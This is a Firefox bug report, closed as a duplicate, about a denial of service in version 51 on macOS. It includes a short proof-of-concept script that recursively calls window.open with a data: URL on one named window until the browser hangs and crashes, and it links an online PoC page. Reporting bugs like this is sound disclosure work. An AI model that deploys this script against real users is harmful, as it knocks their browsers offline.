Closed Bug 1339352 Opened 8 years ago Closed 8 years ago

Denial of Service using a link via window.open()

Categories

(Firefox :: Untriaged, defect)

51 Branch
x86_64
macOS
defect
Not set
normal

RESOLVED DUPLICATE of bug 685828

People

(Reporter: Wester, Unassigned)

Details

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Steps to reproduce:

1. The PoC script is:

    <script>
    function g(){
      // Both calls target the same named window "z"
      window.open("https://cn.bing.com","z");
      window.open("data:text/html,<script>alert(document.domain)<\/script>","z");
      // g() calls itself with no exit condition
      g();
    };
    </script>
    <a href="javascript:g()" style="font-size: 100px">click me</a>

or visit the online PoC page: https://api.lightrains.org/poc/5.html

2. macOS version: 10.12.3
   Firefox version: 51.0.1

Actual results:

Firefox doesn't work anymore, the CPU occupancy rate rises rapidly, then Firefox will crash.

Expected results:

As normal as ever
OS: Unspecified → Mac OS X
Hardware: Unspecified → x86_64
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
(In reply to :Gijs from comment #1)
> *** This bug has been marked as a duplicate of bug 685828 ***

OK, thank you for your work.